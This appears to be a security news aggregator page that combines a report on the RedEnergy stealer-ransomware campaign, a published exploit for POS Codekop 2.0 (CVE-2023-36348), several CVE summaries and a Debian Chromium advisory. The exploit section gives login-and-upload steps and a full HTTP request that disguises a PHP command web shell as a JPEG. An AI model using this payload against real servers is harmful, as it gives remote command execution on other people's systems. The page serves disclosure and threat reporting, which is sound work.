A sophisticated stealer-as-a-ransomware threat dubbed RedEnergy has been spotted in the wild targeting energy utilities, oil, gas, telecom, and machinery sectors in Brazil and the Philippines through their LinkedIn pages.
The malware "possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for

Critical Infrastructure Security

A sophisticated stealer-as-a-ransomware threat dubbed **RedEnergy** has been spotted in the wild targeting energy utilities, oil, gas, telecom, and machinery sectors in Brazil and the Philippines through their LinkedIn pages.

The malware "possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for carrying out ransomware activities," Zscaler researchers Shatak Jain and Gurkirat Singh said in a recent analysis.

The goal, the researchers noted, is to couple data theft with encryption with the goal of inflicting maximum damage to the victims.

The starting point for the multi-stage attack is a FakeUpdates (aka SocGholish) campaign that tricks users into downloading JavaScript-based malware under the guise of web browser updates.

What makes it novel is the use of reputable LinkedIn pages to target victims, redirecting users clicking on the website URLs to a bogus landing page that prompts them to update their web browsers by clicking on the appropriate icon (Google Chrome, Microsoft Edge, Mozilla Firefox, or Opera), doing so which results in the download a malicious executable.

Following a successful breach, the malicious binary is used as a conduit to set up persistence, perform the actual browser update, and also drop a stealer capable of covertly harvesting sensitive information and encrypting the stolen files, leaving the victims at risk of potential data loss, exposure, or even the sale of their valuable data.

Zscaler said it discovered suspicious interactions taking place over a File Transfer Protocol (FTP) connection, raising the possibility that valuable data is being exfiltrated to actor-controlled infrastructure.

In the final stage, RedEnergy's ransomware component proceeds to encrypt the user's data, suffixing the ".FACKOFF!" extension to each encrypted file, deleting existing backups, and dropping a ransom note in each folder.

Victims are expected to make a payment of 0.005 BTC (about $151) to a cryptocurrency wallet mentioned in the note to regain access to the files. RedEnergy's dual functions as a stealer and ransomware represent an evolution of the cybercrime landscape.

The development also follows the emergence of a new RAT-as-a-ransomware threat category in which remote access trojans such as Venom RAT and Anarchy Panel RAT have been equipped with ransomware modules to lock various file extensions behind encryption barriers.

"It is crucial for individuals and organizations to exercise utmost caution when accessing websites, especially those linked from LinkedIn profiles," the researchers said. "Vigilance in verifying the authenticity of browser updates and being wary of unexpected file downloads is paramount to protect against such malicious campaigns."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

RedEnergy Stealer-as-a-Ransomware Threat Targeting Energy and Telecom Sectors

POS Codekop version 2.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)# Date: 25-05-2023# Exploit Author: yuyudhn# Vendor Homepage: https://www.codekop.com/# Software Link: https://github.com/fauzan1892/pos-kasir-php# Version: 2.0# Tested on: Linux# CVE: CVE-2023-36348# Vulnerability description: The application does not sanitize the filenameparameter when sending data to /fungsi/edit/edit.php?gambar=user. Anattacker can exploit this issue by uploading a PHP file and accessing it,leading to Remote Code Execution.# Reference: https://yuyudhn.github.io/pos-codekop-vulnerability/# Proof of Concept:1. Login to POS Codekop dashboard.2. Go to profile settings.3. Upload PHP script through Upload Profile Photo.Burp Log Example:```POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1Host: localhostContent-Length: 8934Cache-Control: max-age=0sec-ch-ua:sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""**Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data;boundary=----WebKitFormBoundarymVBHqH4m6KgKBnpaUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-User: ?1**Sec-Fetch-Dest: documentReferer: http://localhost/research/pos-kasir-php/index.php?page=userAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhvConnection: close------WebKitFormBoundarymVBHqH4m6KgKBnpaContent-Disposition: form-data; name="foto"; filename="asuka-rce.php"Content-Type: image/jpegÿØÿà JFIF HHÿþ6<?php passthru($_GET['cmd']); __halt_compiler(); ?>ÿÛC-----------------------------```PHP Web Shell location:http://localhost/research/pos-kasir-php/assets/img/user/[random_number]asuka-rce.php

POS Codekop 2.0 Shell Upload

The Tutor LMS WordPress plugin before 2.2.1 does not implement adequate permission checks for REST API endpoints, allowing unauthenticated attackers to access information from Lessons that should not be publicly available.

CVE-2023-3133: Tutor LMS – eLearning and online course solution

Out of bounds read in Google Security Processor firmware in Google Chrome on Chrome OS prior to 114.0.5735.90 allowed a local attacker to perform denial of service via physical access to the device. (Chromium security severity: Medium)

CVE-2023-3497

During a Mojo IPC method call, there are multiple stages of validation and deserialization that take place. These assume that the contents of the message cannot be modified during the deserialization process, but the new core_ipcz implementation returns message contents directly in shared memory.

Chrome Mojo Message Validation Bypass

Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability

CVE-2021-34506

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability

CVE-2021-34475

CVE-2021-31982

Microsoft Edge (Chromium-based) Information Disclosure Vulnerability

CVE-2021-42307

Debian Linux Security Advisory 5440-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5440-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 28, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-3420 CVE-2023-3421 CVE-2023-3422Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the oldstable distribution (bullseye), these problems have been fixedin version 114.0.5735.198-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 114.0.5735.198-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSceTMACgkQEMKTtsN8TjYsiA/+OWn1Ps1ARDZgEE82rN+QOLoo6/WWVGk+ZafRaHK1s3aoLC250A/kTEBQLtUgk8b8+xlcvB86GfNASakBwfbmZG9q1joXsTDzQsK9l1vsbtFIfiOgS2a1P3mZkFPCux+yLfFvKRwg9ofBphAY5CFgmzPjU4E0OHtDlwfie4CJsJ9PQuWprWZXmIo5W5p5/rpGCEZCK7VWlG6aocoSeScYGsfKl0ue8He990eZg4KuHbxsHzVMvuX+DtACFe2x3WdZKkyxaucHKD4WIawVh87zFAx0+Fnf1IXAkegyowDEy0D17zI4/Nab92JMAd2YLxnonMp+56ESLqU6AD+P16OWpMKpsFg0J20u/BqCcGsP9GtfsYev1MIJBVolm/ph7m4PgkcgwXXy0atGM2D0T9BqLTYEFm3MK2AA2yyUXIRw5QA0VwJk57cguOF+hFJrhwbhTvlKNthpQrrhhh2tRzIO1x+BT6NDMpBFyS2Y0x7+e8E4HdRwr3FTmf26sxfzRKhGHjM4gUwb2yKFLgwIjriZBgY2OC1gPHMod3oFHOKf0Ml/piRQRNXuJFUZCdMaZirdzCWE5BeNJX42wdWLDdpPFTf1TtEJuaX/AD59TOPa3p23mO4cqJTOehZ3u/EPOm3zRCjBT2GPKy911xO9sxoPsff2F1mW/ndQU6/ybeAjLBk==jLPG-----END PGP SIGNATURE-----

Tag

#chrome